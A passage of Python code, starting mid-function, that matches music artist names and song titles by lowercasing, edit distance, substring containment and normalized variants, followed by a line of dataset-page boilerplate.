    variants.add(s)
    s = remove_brackets(s)
    variants.add(s)
    # strip punctuation, then all spaces; the set de-duplicates
    return set(remove_spaces(remove_nonalphanumeric(v)) for v in variants)
def same_artist(name1, name2):
    """
    Compare two artists:
    - edit distance
    - if one name is contained in the other
    - by normalizing the names
    Return True if it's the same artist, False otherwise.
    """
    n1 = to_lower_case(name1)
    n2 = to_lower_case(name2)
    # trivial: exact match after lowercasing
    if n1 == n2:
        return True
    # small edit distance, but only when at least one name is long enough
    if (len(n1) >= 10 or len(n2) >= 10) and Levenshtein.distance(n1, n2) <= 2:
        return True
    # substring containment, both names long enough
    if len(n1) >= 10 and len(n2) >= 10:
        longer, shorter = (n1, n2) if len(n1) > len(n2) else (n2, n1)
        if longer.find(shorter) >= 0:
            return True
    # last resort: any normalized variant in common
    if normalize_artist(n1) & normalize_artist(n2):
        return True
    return False
def same_title(title1, title2):
    """
    Compare two titles:
    - edit distance
    - if one name is contained in the other
    - by normalizing the title
    Return True if it's the same title, False otherwise.
    """
    t1 = to_lower_case(title1)
    t2 = to_lower_case(title2)
    # trivial: exact match after lowercasing
    if t1 == t2:
        return True
    # small edit distance, but only when at least one title is long enough
    if (len(t1) >= 10 or len(t2) >= 10) and Levenshtein.distance(t1, t2) <= 2:
        return True
    # substring containment, both titles long enough
    if len(t1) >= 10 and len(t2) >= 10:
        longer, shorter = (t1, t2) if len(t1) > len(t2) else (t2, t1)
        if longer.find(shorter) >= 0:
            return True
    # last resort: any normalized variant in common
    if normalize_title(t1) & normalize_title(t2):
        return True
    return False
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.